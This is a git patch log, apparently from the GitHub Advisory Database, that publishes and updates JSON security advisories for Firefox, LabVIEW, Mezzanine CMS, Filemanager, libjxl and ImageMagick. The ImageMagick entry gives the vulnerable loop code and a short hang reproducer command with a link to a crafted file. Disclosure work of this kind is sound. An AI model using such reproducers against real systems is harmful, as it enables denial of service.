"aliases": [ "CVE-2025-8035" ], "details": "Memory safety bugs present in Firefox ESR 128.12, Thunderbird ESR 128.12, Firefox ESR 140.0, Thunderbird ESR 140.0, Firefox 140 and Thunderbird 140. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 141, Firefox ESR < 128.13, Firefox ESR < 140.1, Thunderbird < 141, Thunderbird < 128.13, and Thunderbird < 140.1.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -44,8 +49,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:50Z" diff --git a/advisories/unreviewed/2025/07/GHSA-rxm7-9j9m-hc3w/GHSA-rxm7-9j9m-hc3w.json b/advisories/unreviewed/2025/07/GHSA-rxm7-9j9m-hc3w/GHSA-rxm7-9j9m-hc3w.json new file mode 100644 index 0000000000000..86d4c5180c6f6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rxm7-9j9m-hc3w/GHSA-rxm7-9j9m-hc3w.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rxm7-9j9m-hc3w", + "modified": "2025-07-23T18:30:36Z", + "published": "2025-07-23T18:30:36Z", + "aliases": [ + "CVE-2025-2634" + ], + "details": "Out of bounds read vulnerability due to improper bounds checking in NI LabVIEW in fontmgr may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI. This vulnerability affects NI LabVIEW 2025 Q1 and prior versions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2634" + }, + { + "type": "WEB", + "url": "https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/out-of-bounds-read-vulnerabilities-in-ni-labview.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1285" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T16:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-ww6j-fhx6-wrxh/GHSA-ww6j-fhx6-wrxh.json b/advisories/unreviewed/2025/07/GHSA-ww6j-fhx6-wrxh/GHSA-ww6j-fhx6-wrxh.json index b6a4920322fe4..819c3a427363b 100644 --- a/advisories/unreviewed/2025/07/GHSA-ww6j-fhx6-wrxh/GHSA-ww6j-fhx6-wrxh.json +++ b/advisories/unreviewed/2025/07/GHSA-ww6j-fhx6-wrxh/GHSA-ww6j-fhx6-wrxh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-ww6j-fhx6-wrxh", - "modified": "2025-07-22T21:31:16Z", + "modified": "2025-07-23T18:30:36Z", "published": "2025-07-22T21:31:15Z", "aliases": [ "CVE-2025-8043" ], "details": "Focus incorrectly truncated URLs towards the beginning instead of around the origin. This vulnerability affects Firefox < 141 and Thunderbird < 141.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-451" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-22T21:15:51Z" From d2f42a28cdc39837d74194d5d2c4a91236d4ddcc Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 18:43:40 +0000 Subject: [PATCH 124/323] Publish GHSA-2gxp-6r36-m97r --- .../2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/advisories/github-reviewed/2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json b/advisories/github-reviewed/2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json index 747f6d6e19e32..db667e3b6cb6e 100644 --- a/advisories/github-reviewed/2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json +++ b/advisories/github-reviewed/2025/07/GHSA-2gxp-6r36-m97r/GHSA-2gxp-6r36-m97r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2gxp-6r36-m97r", - "modified": "2025-07-23T15:02:08Z", + "modified": "2025-07-23T18:41:43Z", "published": "2025-07-21T14:08:40Z", "aliases": [ "CVE-2025-53528" @@ -48,6 +48,10 @@ "type": "WEB", "url": "https://github.com/zmievsa/cadwyn/commit/b424ecd57cd8dabbc8fe39b8f8ccafea629c7728" }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/cadwyn/PYSEC-2025-71.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/zmievsa/cadwyn" From 4e655d87841f523adab2e581f67b6d1ae6afc85a Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 19:20:41 +0000 Subject: [PATCH 125/323] Publish GHSA-m5hw-rhvr-f47c --- .../GHSA-m5hw-rhvr-f47c.json | 31 ++++++++++++++++--- 1 file changed, 26 insertions(+), 5 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json (62%) diff --git a/advisories/unreviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json b/advisories/github-reviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json similarity index 62% rename from advisories/unreviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json rename to advisories/github-reviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json index fbb82fe20352b..23ef8be58bde6 100644 --- a/advisories/unreviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json +++ b/advisories/github-reviewed/2025/07/GHSA-m5hw-rhvr-f47c/GHSA-m5hw-rhvr-f47c.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-m5hw-rhvr-f47c", - "modified": "2025-07-23T18:30:33Z", + "modified": "2025-07-23T19:18:55Z", "published": "2025-07-18T15:31:56Z", "aliases": [ "CVE-2025-46001" ], + "summary": "simogeo/filemanager arbitrary file upload vulnerability", "details": "An arbitrary file upload vulnerability in the is_allowed_file_type() function of Filemanager v2.3.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.", "severity": [ { @@ -13,14 +14,34 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "simogeo/filemanager" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "< 2.5.0" + } + } + ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46001" }, { - "type": "WEB", + "type": "PACKAGE", "url": "https://github.com/simogeo/Filemanager" }, { @@ -37,8 +58,8 @@ "CWE-434" ], "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T19:18:55Z", "nvd_published_at": "2025-07-18T14:15:24Z" } } \ No newline at end of file From 4c09031fb5ff193d4e93446f12fb3719e18fb1e5 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 19:35:19 +0000 Subject: [PATCH 126/323] Publish GHSA-269j-37ww-cmh3 --- .../GHSA-269j-37ww-cmh3.json | 31 ++++++++++++++++--- 1 file changed, 26 insertions(+), 5 deletions(-) rename advisories/{unreviewed => github-reviewed}/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json (62%) diff --git a/advisories/unreviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json b/advisories/github-reviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json similarity index 62% rename from advisories/unreviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json rename to advisories/github-reviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json index 2c191437c6907..eab0353921d63 100644 --- a/advisories/unreviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json +++ b/advisories/github-reviewed/2025/07/GHSA-269j-37ww-cmh3/GHSA-269j-37ww-cmh3.json @@ -1,11 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-269j-37ww-cmh3", - "modified": "2025-07-23T18:30:36Z", + "modified": "2025-07-23T19:33:15Z", "published": "2025-07-23T18:30:36Z", "aliases": [ "CVE-2025-50481" ], + "summary": "Mezzanine CMS vulnerable to Cross-site Scripting", "details": "A cross-site scripting (XSS) vulnerability in the component /blog/blogpost/add of Mezzanine CMS v6.1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into a blog post.", "severity": [ { @@ -13,7 +14,27 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "Mezzanine" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "6.1.0" + } + ] + } + ] + } + ], "references": [ { "type": "ADVISORY", @@ -24,7 +45,7 @@ "url": "https://github.com/kevinpdicks/Mezzanine-CMS-6.1.0-XSS" }, { - "type": "WEB", + "type": "PACKAGE", "url": "https://github.com/stephenmcd/mezzanine" } ], @@ -33,8 +54,8 @@ "CWE-79" ], "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T19:33:15Z", "nvd_published_at": "2025-07-23T16:15:26Z" } } \ No newline at end of file From 8edff0bb1ae95dbb5198d5d0f02fbeb1ac7051ad Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 20:05:17 +0000 Subject: [PATCH 127/323] Publish GHSA-vmhh-8rxq-fp9g --- .../GHSA-vmhh-8rxq-fp9g.json | 419 ++++++++++++++++++ 1 file changed, 419 insertions(+) create mode 100644 advisories/github-reviewed/2025/07/GHSA-vmhh-8rxq-fp9g/GHSA-vmhh-8rxq-fp9g.json diff --git a/advisories/github-reviewed/2025/07/GHSA-vmhh-8rxq-fp9g/GHSA-vmhh-8rxq-fp9g.json b/advisories/github-reviewed/2025/07/GHSA-vmhh-8rxq-fp9g/GHSA-vmhh-8rxq-fp9g.json new file mode 100644 index 0000000000000..3d371434f26e8 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-vmhh-8rxq-fp9g/GHSA-vmhh-8rxq-fp9g.json @@ -0,0 +1,419 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmhh-8rxq-fp9g", + "modified": "2025-07-23T20:03:42Z", + "published": "2025-07-23T20:03:41Z", + "aliases": [ + "CVE-2025-53015" + ], + "summary": "ImageMagick has XMP profile write that triggers hang due to unbounded loop", + "details": "### Summary\nInfinite lines occur when writing during a specific XMP file conversion command\n### Details\n```\n#0 GetXmpNumeratorAndDenominator (denominator=, numerator=, value=) at MagickCore/profile.c:2578\n#1 GetXmpNumeratorAndDenominator (denominator=, numerator=, value=720000000000000) at MagickCore/profile.c:2564\n#2 SyncXmpProfile (image=image@entry=0x555555bb9ea0, profile=0x555555b9d020) at MagickCore/profile.c:2605\n#3 0x00005555555db5cf in SyncImageProfiles (image=image@entry=0x555555bb9ea0) at MagickCore/profile.c:2651\n#4 0x0000555555798d4f in WriteImage (image_info=image_info@entry=0x555555bc2050, image=image@entry=0x555555bb9ea0, exception=exception@entry=0x555555b7bea0) at MagickCore/constitute.c:1288\n#5 0x0000555555799862 in WriteImages (image_info=image_info@entry=0x555555bb69c0, images=, images@entry=0x555555bb9ea0, filename=, exception=0x555555b7bea0) at MagickCore/constitute.c:1575\n#6 0x00005555559650c4 in CLINoImageOperator (cli_wand=cli_wand@entry=0x555555b85790, option=option@entry=0x5555559beebe \"-write\", arg1n=arg1n@entry=0x7fffffffe2c7 \"a.mng\", arg2n=arg2n@entry=0x0) at MagickWand/operation.c:4993\n#7 0x0000555555974579 in CLIOption (cli_wand=cli_wand@entry=0x555555b85790, option=option@entry=0x5555559beebe \"-write\") at MagickWand/operation.c:5473\n#8 0x00005555559224aa in ProcessCommandOptions (cli_wand=cli_wand@entry=0x555555b85790, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, index=index@entry=1) at MagickWand/magick-cli.c:758\n#9 0x000055555592276d in MagickImageCommand (image_info=image_info@entry=0x555555b824a0, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, metadata=metadata@entry=0x7fffffffbc10, exception=exception@entry=0x555555b7bea0) at MagickWand/magick-cli.c:1392\n#10 0x00005555559216a0 in MagickCommandGenesis (image_info=image_info@entry=0x555555b824a0, command=command@entry=0x555555922640 , argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8, metadata=0x0, exception=exception@entry=0x555555b7bea0) at MagickWand/magick-cli.c:177\n#11 0x000055555559f76b in MagickMain (argc=3, argv=0x7fffffffdfa8) at utilities/magick.c:162\n#12 0x00007ffff700fd90 in __libc_start_call_main (main=main@entry=0x55555559aec0
, argc=argc@entry=3, argv=argv@entry=0x7fffffffdfa8) at ../sysdeps/nptl/libc_start_call_main.h:58\n#13 0x00007ffff700fe40 in __libc_start_main_impl (main=0x55555559aec0
, argc=3, argv=0x7fffffffdfa8, init=, fini=, rtld_fini=, stack_end=0x7fffffffdf98) at ../csu/libc-start.c:392\n#14 0x000055555559f535 in _start ()\n```\n```\nstatic void GetXmpNumeratorAndDenominator(double value,\n unsigned long *numerator,unsigned long *denominator)\n{\n double\n df;\n\n *numerator=0;\n *denominator=1;\n if (value <= MagickEpsilon)\n return;\n *numerator=1;\n df=1.0;\n while(fabs(df - value) > MagickEpsilon)\n {\n if (df < value)\n (*numerator)++;\n else\n {\n (*denominator)++;\n *numerator=(unsigned long) (value*(*denominator));\n }\n df=*numerator/(double)*denominator;\n }\n}\n```\nIn this code, the loop `while(fabs(df - value) > MagickEpsilon)` keeps repeating endlessly.\n\n### PoC\n`magick hang a.mng`\nhttps://drive.google.com/file/d/1iegkwlTjqnJTtM4XkiheYsjKsC6pxtId/view?usp=sharing\n\n### Impact\nXMP profile write triggers hang due to unbounded loop\n\n\n### credits\n**Team Pay1oad DVE** \n\n**Reporter** : **Shinyoung Won** (with contributions from **WooJin Park, DongHa Lee, JungWoo Park, Woojin Jeon, Juwon Chae**, **Kyusang Han, JaeHun Gou**)\n\n**yosimich(@yosiimich**) **Shinyoung Won** of SSA Lab\n\ne-mail : [yosimich123@gmail.com]\n\n**Woojin Jeon**\n\nGtihub : brainoverflow\n\ne-mail : [root@brainoverflow.kr]\n\n**WooJin Park**\n\nGitHub : jin-156\n\ne-mail : [1203kids@gmail.com]\n\n**Who4mI(@GAP-dev) Lee DongHa of SSA Lab**\n\nGithub: GAP-dev\n\ne-mail : [ceo@zeropointer.co.kr]\n\n**JungWoo Park**\n\nGithub : JungWooJJING\n\ne-mail : [cuby5577@gmail.com]\n\n**Juwon Chae** \n\nGithub : I_mho\n\ne-mail : [wndnjs4698@naver.com]\n\n**Kyusang Han**\n\nGithub : T1deSEC\n\ne-mail : [hksjoe0081@gmail.com]\n\n**JaeHun Gou**\n\nGithub : P2GONE\n\ne-mail : [charly20@naver.com]\n\n### Commits\nFixed in: https://github.com/ImageMagick/ImageMagick/commit/229fa96a988a21d78318bbca61245a6ed1ee33a0 and https://github.com/ImageMagick/ImageMagick/commit/38631605e6ab744548a561797472cf8648bcfe26", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-AnyCPU" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q8-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-OpenMP-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-OpenMP-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Magick.NET-Q16-HDRI-OpenMP-arm64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "14.7.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-vmhh-8rxq-fp9g" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53015" + }, + { + "type": "WEB", + "url": "https://github.com/ImageMagick/ImageMagick/commit/229fa96a988a21d78318bbca61245a6ed1ee33a0" + }, + { + "type": "WEB", + "url": "https://github.com/ImageMagick/ImageMagick/commit/38631605e6ab744548a561797472cf8648bcfe26" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1iegkwlTjqnJTtM4XkiheYsjKsC6pxtId/view?usp=sharing" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ImageMagick/ImageMagick" + }, + { + "type": "WEB", + "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-835" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T20:03:41Z", + "nvd_published_at": "2025-07-14T20:15:28Z" + } +} \ No newline at end of file From e4e78beab40312b4f8f3c0cfdb7e88833fb86c4f Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 23 Jul 2025 21:38:36 +0000 Subject: [PATCH 128/323] Publish Advisories GHSA-w22f-vwwp-37pr GHSA-23ff-wfv3-xrvg GHSA-5pp5-4vfv-784q GHSA-j9g6-vvr6-x5wm GHSA-p9rf-64qj-22rw GHSA-3vm2-3vf9-9j39 GHSA-cfv9-2rgf-f55c GHSA-3h67-j53j-m22p GHSA-4jf4-wr6q-827p GHSA-4xw2-w53m-rwj2 GHSA-676m-p53v-8qw7 GHSA-8xjp-c72j-67q8 GHSA-f46f-fjf4-h4m2 GHSA-j8hp-g4wv-c9xj GHSA-jp65-2h7q-qfg7 GHSA-rj69-p564-922p GHSA-v669-7gjg-96jr GHSA-vqmp-p2v4-jvvq --- .../GHSA-w22f-vwwp-37pr.json | 22 +++++++++- .../GHSA-23ff-wfv3-xrvg.json | 6 ++- .../GHSA-5pp5-4vfv-784q.json | 6 ++- .../GHSA-j9g6-vvr6-x5wm.json | 6 ++- .../GHSA-p9rf-64qj-22rw.json | 6 ++- .../GHSA-3vm2-3vf9-9j39.json | 6 ++- .../GHSA-cfv9-2rgf-f55c.json | 6 ++- .../GHSA-3h67-j53j-m22p.json | 44 +++++++++++++++++++ .../GHSA-4jf4-wr6q-827p.json | 44 +++++++++++++++++++ .../GHSA-4xw2-w53m-rwj2.json | 15 +++++-- .../GHSA-676m-p53v-8qw7.json | 40 +++++++++++++++++ .../GHSA-8xjp-c72j-67q8.json | 40 +++++++++++++++++ .../GHSA-f46f-fjf4-h4m2.json | 40 +++++++++++++++++ .../GHSA-j8hp-g4wv-c9xj.json | 15 +++++-- .../GHSA-jp65-2h7q-qfg7.json | 11 +++-- .../GHSA-rj69-p564-922p.json | 15 +++++-- .../GHSA-v669-7gjg-96jr.json | 11 +++-- .../GHSA-vqmp-p2v4-jvvq.json | 3 +- 18 files changed, 310 insertions(+), 26 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-3h67-j53j-m22p/GHSA-3h67-j53j-m22p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-4jf4-wr6q-827p/GHSA-4jf4-wr6q-827p.json create mode 100644 advisories/unreviewed/2025/07/GHSA-676m-p53v-8qw7/GHSA-676m-p53v-8qw7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-8xjp-c72j-67q8/GHSA-8xjp-c72j-67q8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-f46f-fjf4-h4m2/GHSA-f46f-fjf4-h4m2.json diff --git a/advisories/unreviewed/2024/10/GHSA-w22f-vwwp-37pr/GHSA-w22f-vwwp-37pr.json b/advisories/unreviewed/2024/10/GHSA-w22f-vwwp-37pr/GHSA-w22f-vwwp-37pr.json index cc77cf8f50e11..6435b6bb32a9c 100644 --- a/advisories/unreviewed/2024/10/GHSA-w22f-vwwp-37pr/GHSA-w22f-vwwp-37pr.json +++ b/advisories/unreviewed/2024/10/GHSA-w22f-vwwp-37pr/GHSA-w22f-vwwp-37pr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w22f-vwwp-37pr", - "modified": "2025-07-14T21:31:42Z", + "modified": "2025-07-23T21:36:42Z", "published": "2024-10-22T18:32:11Z", "aliases": [ "CVE-2024-10234" @@ -35,6 +35,26 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:10931" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11636" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11638" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11639" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11640" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11645" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:2025" diff --git a/advisories/unreviewed/2024/11/GHSA-23ff-wfv3-xrvg/GHSA-23ff-wfv3-xrvg.json b/advisories/unreviewed/2024/11/GHSA-23ff-wfv3-xrvg/GHSA-23ff-wfv3-xrvg.json index debfab8085f5d..4392467ab1970 100644 --- a/advisories/unreviewed/2024/11/GHSA-23ff-wfv3-xrvg/GHSA-23ff-wfv3-xrvg.json +++ b/advisories/unreviewed/2024/11/GHSA-23ff-wfv3-xrvg/GHSA-23ff-wfv3-xrvg.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-23ff-wfv3-xrvg", - "modified": "2024-11-25T18:33:27Z", + "modified": "2025-07-23T21:36:43Z", "published": "2024-11-25T18:33:27Z", "aliases": [ "CVE-2024-11498" ], "details": "There exists a stack buffer overflow in libjxl. A specifically-crafted file can cause the JPEG XL decoder to use large amounts of stack space (up to 256mb is possible, maybe 512mb), potentially exhausting the stack. An attacker can craft a file that will cause excessive memory usage. We recommend upgrading past commit 65fbec56bc578b6b6ee02a527be70787bbd053b0.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2024/11/GHSA-5pp5-4vfv-784q/GHSA-5pp5-4vfv-784q.json b/advisories/unreviewed/2024/11/GHSA-5pp5-4vfv-784q/GHSA-5pp5-4vfv-784q.json index bcdb9cd72f767..742318f864e14 100644 --- a/advisories/unreviewed/2024/11/GHSA-5pp5-4vfv-784q/GHSA-5pp5-4vfv-784q.json +++ b/advisories/unreviewed/2024/11/GHSA-5pp5-4vfv-784q/GHSA-5pp5-4vfv-784q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5pp5-4vfv-784q", - "modified": "2024-11-25T18:33:26Z", + "modified": "2025-07-23T21:36:43Z", "published": "2024-11-25T18:33:26Z", "aliases": [ "CVE-2024-11403" ], "details": "There exists an out of bounds read/write in LibJXL versions prior to commit 9cc451b91b74ba470fd72bd48c121e9f33d24c99. The JPEG decoder used by the JPEG XL encoder when doing JPEG recompression (i.e. if using JxlEncoderAddJPEGFrame on untrusted input) does not properly check bounds in the presence of incomplete codes. This could lead to an out-of-bounds write. In jpegli which is released as part of the same project, the same vulnerability is present. However, the relevant buffer is part of a bigger structure, and the code makes no assumptions on the values that could be overwritten. The issue could however cause jpegli to read uninitialised memory, or addresses of functions.", "severity": [ + { + "type": "CVSS_V3", + "score": 